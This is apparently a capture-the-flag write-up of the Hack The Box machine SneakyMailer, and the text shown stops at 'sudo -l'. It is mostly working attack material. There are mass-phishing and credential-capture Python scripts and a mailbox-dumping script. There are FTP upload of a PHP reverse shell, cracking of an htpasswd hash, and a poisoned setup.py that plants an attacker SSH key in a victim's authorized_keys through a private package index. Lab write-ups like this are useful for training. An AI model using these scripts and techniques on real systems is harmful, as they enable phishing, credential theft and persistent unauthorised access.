~~~
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 09:29 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:29
Completed NSE at 09:29, 0.00s elapsed
Initiating NSE at 09:29
Completed NSE at 09:29, 0.00s elapsed
Initiating NSE at 09:29
Completed NSE at 09:29, 0.00s elapsed
Initiating Ping Scan at 09:29
Scanning 10.10.10.197 [4 ports]
Completed Ping Scan at 09:29, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:29
Scanning dev.sneakycorp.htb (10.10.10.197) [1000 ports]
Discovered open port 25/tcp on 10.10.10.197
Discovered open port 80/tcp on 10.10.10.197
Discovered open port 22/tcp on 10.10.10.197
Discovered open port 21/tcp on 10.10.10.197
Discovered open port 993/tcp on 10.10.10.197
Discovered open port 143/tcp on 10.10.10.197
Discovered open port 8080/tcp on 10.10.10.197
Completed SYN Stealth Scan at 09:29, 11.04s elapsed (1000 total ports)
Initiating Service scan at 09:29
Scanning 7 services on dev.sneakycorp.htb (10.10.10.197)
Completed Service scan at 09:29, 11.81s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #2) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #3) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #4) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #5) against dev.sneakycorp.htb (10.10.10.197)
Initiating Traceroute at 09:30
Completed Traceroute at 09:30, 0.32s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:30
Completed Parallel DNS resolution of 2 hosts. at 09:30, 0.57s elapsed
NSE: Script scanning 10.10.10.197.
Initiating NSE at 09:30
Completed NSE at 09:30, 19.73s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 31.01s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Nmap scan report for dev.sneakycorp.htb (10.10.10.197)
Host is up (0.66s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.14.2
|_http-title: Employee - Dashboard
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: completed CAPABILITY IDLE NAMESPACE ACL THREAD=REFERENCES QUOTA CHILDREN UTF8=ACCEPTA0001 IMAP4rev1 ENABLE OK ACL2=UNION STARTTLS THREAD=ORDEREDSUBJECT SORT UIDPLUS
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/13%OT=21%CT=1%CU=36468%PV=Y%DS=2%DC=T%G=Y%TM=5F0BDC7
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 7.778 days (since Sun Jul  5 14:50:01 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   322.24 ms 10.10.14.1
2   322.25 ms dev.sneakycorp.htb (10.10.10.197)

NSE: Script Post-scanning.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.42 seconds
           Raw packets sent: 1619 (75.262KB) | Rcvd: 1163 (50.101KB)
~~~
ENUMERATION
The website lists the employees' e-mail addresses, so we harvest them with CeWL (its `-e` option extracts e-mail addresses from the crawled pages) and save them to a text file.
EMAILS WORDLISTS :
~~~
airisatou@sneakymailer.htb
angelicaramos@sneakymailer.htb
ashtoncox@sneakymailer.htb
bradleygreer@sneakymailer.htb
brendenwagner@sneakymailer.htb
briellewilliamson@sneakymailer.htb
brunonash@sneakymailer.htb
caesarvance@sneakymailer.htb
carastevens@sneakymailer.htb
cedrickelly@sneakymailer.htb
chardemarshall@sneakymailer.htb
colleenhurst@sneakymailer.htb
dairios@sneakymailer.htb
donnasnider@sneakymailer.htb
doriswilder@sneakymailer.htb
finncamacho@sneakymailer.htb
fionagreen@sneakymailer.htb
garrettwinters@sneakymailer.htb
gavincortez@sneakymailer.htb
gavinjoyce@sneakymailer.htb
glorialittle@sneakymailer.htb
haleykennedy@sneakymailer.htb
hermionebutler@sneakymailer.htb
herrodchandler@sneakymailer.htb
hopefuentes@sneakymailer.htb
howardhatfield@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
jenagaines@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
jenniferacosta@sneakymailer.htb
jenniferchang@sneakymailer.htb
jonasalexander@sneakymailer.htb
laelgreer@sneakymailer.htb
martenamccray@sneakymailer.htb
michaelsilva@sneakymailer.htb
michellehouse@sneakymailer.htb
olivialiang@sneakymailer.htb
paulbyrd@sneakymailer.htb
prescottbartlett@sneakymailer.htb
quinnflynn@sneakymailer.htb
rhonadavidson@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
sergebaldwin@sneakymailer.htb
shaddecker@sneakymailer.htb
shouitou@sneakymailer.htb
sonyafrost@sneakymailer.htb
sukiburks@sneakymailer.htb
sulcud@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
thorwalton@sneakymailer.htb
tigernixon@sneakymailer.htb
timothymooney@sneakymailer.htb
unitybutler@sneakymailer.htb
vivianharrell@sneakymailer.htb
yuriberry@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb
~~~
For reference you can watch IppSec's video on the Chaos box, which uses the same phishing trick. The Postfix server relays mail for the sneakymailer.htb domain (it also advertises VRFY, so addresses could be validated up front), so we send each address on the list a mail that contains nothing but a link to our own machine. After a short while one of the recipients follows the link and submits a registration form to our listener, and that form carries a password.
SENDING MAIL :
~~~
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #telnet 10.10.10.197 25
Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
MAIL FROM: liquid@sna220 debian ESMTP Postfix (Debian/GNU)
501 5.1.7 Bad sender address syntax
MAIL FROM: liquid@sneakymailer.htb
250 2.1.0 Ok
MAIL TO: paulbyrd@sneakymailer.htb
503 5.5.1 Error: nested MAIL command
RCPT TO: paulbyrd@sneakymailer.htb
250 2.1.5 Ok
DATA
h354 End data with <CR><LF>.<CR><LF>
http://10.10.15.56/
.
250 2.0.0 Ok: queued as 23A9424686
~~~

(The first MAIL FROM collided with the 220 banner still arriving, hence the 501; and the recipient is given with RCPT TO, not MAIL TO, which Postfix rejects as a nested MAIL command.)
RESPONSE BACK ON PORT 80 :
~~~
┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 53704
POST /%0D HTTP/1.1
Host: 10.10.15.56
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt^C
~~~
URL-decoded, the captured credentials are:

paulbyrd@sneakymailer.htb : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
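The two steps above (mailing every harvested address a link, then catching the form POST that comes back) as one script. This is an added example and not code from the original write-up: the addresses, the listener port and the captured request are taken from the text; the subject line, the `RecordingTransport` stand-in used to exercise the sending loop offline, and the `CaptureHandler` that replaces `nc -lnvp 80` are assumptions of the example.

```python
"""Added example (not from the write-up): phish a list of addresses with a
link, then decode the credential POST that the victim's client sends back."""
import smtplib
from email.message import EmailMessage
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Constructed sample: three addresses from the harvested wordlist above.
TARGETS = [
    "paulbyrd@sneakymailer.htb",
    "sulcud@sneakymailer.htb",
    "tigernixon@sneakymailer.htb",
]


def build_message(sender: str, recipient: str, link: str) -> EmailMessage:
    """One plain-text mail whose body is just the link to our listener."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Please re-register your account"   # assumed subject
    msg.set_content(f"{link}\n")
    return msg


class RecordingTransport:
    """Stand-in for smtplib.SMTP so the loop can be run offline in tests."""

    def __init__(self):
        self.messages = []

    def send_message(self, msg):
        self.messages.append(msg)

    def quit(self):
        pass


def send_all(targets, sender, link, smtp_host="10.10.10.197", smtp_port=25,
             transport=None):
    """Send one message per target; returns the addresses the relay accepted.
    Postfix answers RCPT TO for unknown users with a 5xx, which smtplib
    raises as SMTPRecipientsRefused, so those are skipped rather than fatal."""
    conn = transport if transport is not None else smtplib.SMTP(
        smtp_host, smtp_port, timeout=10)
    sent = []
    try:
        for rcpt in targets:
            try:
                conn.send_message(build_message(sender, rcpt, link))
                sent.append(rcpt)
            except smtplib.SMTPRecipientsRefused:
                continue
    finally:
        conn.quit()
    return sent


def parse_credential_post(raw_request: bytes) -> dict:
    """Turn a raw HTTP request (as nc prints it) into its decoded form fields."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    method, target, _version = head.split(b"\r\n", 1)[0].decode().split(" ", 2)
    if method != "POST":
        raise ValueError(f"expected a POST, got {method} {target}")
    return {k: v[0] for k, v in
            parse_qs(body.decode(), keep_blank_values=True).items()}


class CaptureHandler(BaseHTTPRequestHandler):
    """Minimal listener: prints the decoded fields of every POST it receives."""

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        fields = {k: v[0] for k, v in
                  parse_qs(body.decode(), keep_blank_values=True).items()}
        print(f"{self.client_address[0]}: {fields}")
        self.send_response(200)
        self.end_headers()


# Constructed from the capture shown above (the trailing ^C was the operator).
CAPTURED = (
    b"POST /%0D HTTP/1.1\r\n"
    b"Host: 10.10.15.56\r\n"
    b"User-Agent: python-requests/2.23.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 185\r\n"
    b"\r\n"
    b"firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb"
    b"&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
    b"&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
)

if __name__ == "__main__":
    print(parse_credential_post(CAPTURED))
    # Live run: start the listener first, then mail the list.
    # HTTPServer(("0.0.0.0", 80), CaptureHandler).serve_forever()
    # send_all(TARGETS, "liquid@sneakymailer.htb", "http://10.10.15.56/")
```

`send_all` talks to the relay exactly as the telnet session does (MAIL FROM, RCPT TO, DATA), and a recipient the server rejects at RCPT TO is skipped instead of aborting the run.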
Now we use the Evolution mail client to log in to the IMAP server (port 143, or 993 over TLS) with these credentials and read the mailbox. One of the mails contains a password for the developer account:

developer : m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

For the Evolution setup you can check IppSec's Chaos video.
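The mailbox can also be read without a GUI client, using Python's `imaplib`. This is an added example, not the write-up's own code: the host and port come from the scan, the login as `paulbyrd@sneakymailer.htb` is assumed from the captured form, the TLS settings allow for the self-signed `localhost` certificate the scan showed, and the sample message is constructed for the test and does not reproduce the real mail.

```python
"""Added example (not from the write-up): walk every IMAP folder and list the
lines in each message that look like credentials."""
import imaplib
import re
import ssl
from email import message_from_bytes, policy

CRED_RE = re.compile(r"(?i)\b(pass(word)?|pwd|username|user)\b")
# LIST response line:  (\HasNoChildren) "." "INBOX.Sent Items"
LIST_RE = re.compile(r'^\((?P<flags>[^)]*)\) (?P<delim>NIL|"[^"]*") (?P<name>.+)$')


def parse_list_line(line: bytes) -> str:
    """Mailbox name from one IMAP LIST response line (quotes stripped)."""
    m = LIST_RE.match(line.decode())
    if m is None:
        raise ValueError(f"unexpected LIST line: {line!r}")
    name = m.group("name")
    return name[1:-1] if name.startswith('"') and name.endswith('"') else name


def message_text(raw: bytes) -> str:
    """The headers we care about plus the decoded plain-text body."""
    msg = message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    return f"From: {msg['From']}\nTo: {msg['To']}\nSubject: {msg['Subject']}\n\n{text}"


def credential_lines(raw: bytes) -> list:
    """Lines of the message that mention a password or user name."""
    return [ln.strip() for ln in message_text(raw).splitlines() if CRED_RE.search(ln)]


def dump_mailboxes(user, password, host="10.10.10.197", port=143):
    """Log in, STARTTLS (the cert is self-signed for 'localhost', so hostname
    checking is off), and return {folder/msgnum: [credential lines]}."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = imaplib.IMAP4(host, port)
    conn.starttls(ctx)
    conn.login(user, password)
    report = {}
    _, boxes = conn.list()
    for entry in boxes:
        name = parse_list_line(entry)
        typ, _ = conn.select(f'"{name}"', readonly=True)
        if typ != "OK":
            continue
        _, data = conn.search(None, "ALL")
        for num in data[0].split():
            _, fetched = conn.fetch(num, "(RFC822)")
            hits = credential_lines(fetched[0][1])
            if hits:
                report[f"{name}/{num.decode()}"] = hits
    conn.logout()
    return report


# Constructed sample message; the real mail on the box is not reproduced here.
SAMPLE_MAIL = (
    b"From: paulbyrd@sneakymailer.htb\r\n"
    b"To: root@sneakymailer.htb\r\n"
    b"Subject: Password reset (constructed sample)\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"\r\n"
    b"Hello,\r\n"
    b"please reset the password of the developer account to:\r\n"
    b"Username: developer\r\n"
    b"Password: Example-Not-Real-1\r\n"
    b"Thanks\r\n"
)

if __name__ == "__main__":
    print(credential_lines(SAMPLE_MAIL))
    # Live: dump_mailboxes("paulbyrd@sneakymailer.htb", "<password from the capture>")
```

Courier names folders as `INBOX.<name>` with `.` as the hierarchy delimiter, which is why the LIST line is parsed rather than guessed; each folder is opened read-only so the walk leaves no \Seen flags behind.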
FTP LOGINS :
~~~
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Jun 30 01:15 dev
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 19:52 css
drwxr-xr-x    2 0        0            4096 May 26 19:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 19:52 js
drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
226 Directory send OK.
ftp>
~~~
SUBDOMAIN ENUMERATION :
~~~
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" --hc 301 --hw 356 -t 100 10.10.10.197

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.197/
Total requests: 207643

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000007:   400        7 L      12 W     173 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000009:   400        7 L      12 W     173 Ch      "# Suite 300, San Francisco, California, 94105, USA."
000000810:   200        340 L    989 W    13737 Ch    "dev"
~~~
So there is a second vhost, dev.sneakycorp.htb, and it serves the same files we just saw in the FTP `dev` directory (index.php, team.php, css, js, and so on): the developer's FTP root is that site's web root. The `dev` directory is group-writable by gid 1001 (developer) even though the existing files are owned by root, so we cannot edit index.php but we can add files. Any file we upload by FTP is therefore served by nginx and, if it is PHP, executed as www-data. We upload a PHP reverse shell through FTP and trigger it by requesting it on dev.sneakycorp.htb.
UPLOAD SHELL IN DEV DIRECTORY :
~~~
ftp> put register.php
local: register.php remote: register.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5492 bytes sent in 0.01 secs (441.7859 kB/s)
ftp>
~~~
TRIGGER SHELL FROM WEBSITE :
RESPONSE WHICH YOU WILL GET :
~~~
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 48488
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 00:41:17 up 4 min,  0 users,  load average: 0.17, 0.21, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
~~~
GETTING USER ACCESS
~~~
$ bash -i
bash: cannot set terminal process group (685): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sneakymailer:/$ su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
bash: cannot set terminal process group (685): Inappropriate ioctl for device
bash: no job control in this shell
developer@sneakymailer:/$ cd
developer@sneakymailer:~$ id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
developer@sneakymailer:~$ cd ../
developer@sneakymailer:/var/www$ ls
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb
developer@sneakymailer:/var/www$ cd pypi.sneakycorp.htb
developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ ls -la
total 20
drwxr-xr-x 4 root root     4096 May 15 14:29 .
drwxr-xr-x 6 root root     4096 May 14 18:25 ..
-rw-r--r-- 1 root root       43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi     4096 May 14 18:25 venv
developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
~~~
Here we find a third vhost, pypi.sneakycorp.htb, which we add to /etc/hosts, and an .htpasswd file with an Apache `$apr1$` hash for the user pypi, which we copy to our own machine to crack.
So after cracking we got something like this:
~~~
┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #hashcat -m 1600 -a 0 pypihash ../../THM/Wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz, 2048/5898 MB allocatable, 8MCU

$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Time.Started.....: Mon Jul 13 10:17:57 2020 (3 mins, 10 secs)
Time.Estimated...: Mon Jul 13 10:21:07 2020 (0 secs)
Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    19026 H/s (9.30ms) @ Accel:256 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3614720/14344384 (25.20%)
Rejected.........: 0/3614720 (0.00%)
Restore.Point....: 3612672/14344384 (25.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: soulmeets1 -> sotoares

Started: Mon Jul 13 10:17:32 2020
Stopped: Mon Jul 13 10:21:08 2020
~~~
The pypi.sneakycorp.htb vhost on port 8080 is a pypiserver instance, and the cracked pypi password lets us upload packages to it. A Python package's setup.py is executed when the package is built or installed, so whoever installs packages from this index runs whatever we put in setup.py. We therefore upload a package whose setup.py appends our SSH public key to /home/low/.ssh/authorized_keys (the install on the box runs as the user low) and wait for it to be installed.
REFERENCES :
https://pypi.org/project/pypiserver/#upload-with-setuptools
After changing a few lines of the pypiserver sample, the package and the matching .pypirc look like this:
SETUP.PY :

~~~python
import setuptools

# Runs with the privileges of whoever installs the package:
# append our public key to low's authorized_keys.
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChNgxk5jtpjV+hYI+KmW503AaJHeNk11nN14+YNuJ18yXmZn2sqME2DWirrHLpEyYvPeROs0tPBK+K3ZqL8SHierZZHY2FmLIlfAcDzN/mOjZzA3+cXX6iGgOo67nlhaiyisxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJYw+svdLWT4ihbb/LWCeF+Kjam8bXgb8= root@liquid")
except Exception as e:
    pass

setuptools.setup(
    name="example-pkg3",  # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
~~~

PYPIRC :

~~~
[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
~~~
Upload both files into a fresh directory under /tmp, point HOME at that directory so setuptools reads the .pypirc from there, and run:

~~~
python3 setup.py sdist register -r local upload -r local
~~~
~~~
developer@sneakymailer:/$ cd /tmp
developer@sneakymailer:/tmp$ ls
systemd-private-2c8ab75d46924481ac84f56b75c9a067-systemd-timesyncd.service-a5Ynvb
vmware-root_458-834774610
developer@sneakymailer:/tmp$ mkdir liquid
developer@sneakymailer:/tmp$ cd liquid
developer@sneakymailer:/tmp/liquid$ HOME=$(pwd)
developer@sneakymailer:~$ pwd
/tmp/liquid
developer@sneakymailer:~$ wget http://10.10.15.56/setup.py
--2020-07-13 01:06:52--  http://10.10.15.56/setup.py
Connecting to 10.10.15.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1193 (1.2K) [text/plain]
Saving to: ‘setup.py’

     0K .                                                     100% 1.94M=0.001s

2020-07-13 01:06:53 (1.94 MB/s) - ‘setup.py’ saved [1193/1193]

developer@sneakymailer:~$ wget http://10.10.15.56/.pypirc
--2020-07-13 01:07:05--  http://10.10.15.56/.pypirc
Connecting to 10.10.15.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 128 [application/octet-stream]
Saving to: ‘.pypirc’

     0K                                                       100% 19.6M=0s

2020-07-13 01:07:07 (19.6 MB/s) - ‘.pypirc’ saved [128/128]

developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
creating example_pkg3.egg-info
writing example_pkg3.egg-info/PKG-INFO
writing dependency_links to example_pkg3.egg-info/dependency_links.txt
writing top-level names to example_pkg3.egg-info/top_level.txt
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating example-pkg3-0.0.1
creating example-pkg3-0.0.1/example_pkg3.egg-info
copying files to example-pkg3-0.0.1...
copying setup.py -> example-pkg3-0.0.1
copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
Writing example-pkg3-0.0.1/setup.cfg
creating dist
Creating tar archive
removing 'example-pkg3-0.0.1' (and everything under it)
running register
Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
developer@sneakymailer:~$
~~~

Once the package has been installed on the box, our key is in low's authorized_keys and we can just SSH in as low with the matching private key:

~~~
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer/pip]
└──╼ #ssh -i id_rsa low@10.10.10.197
Enter passphrase for key 'id_rsa':
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ cat user.txt
49438ae21c8095ddd5abe9b1608a266c
low@sneakymailer:~$
~~~
GETTING ROOT ACCESS
sudo lets low run /usr/bin/pip3 as root without a password. `pip3 install <directory>` executes that directory's setup.py as the installing user, here root, so a one-line setup.py that execs /bin/sh on our tty is a root shell (the GTFOBins pip technique):

~~~
low@sneakymailer:~$ sudo -l
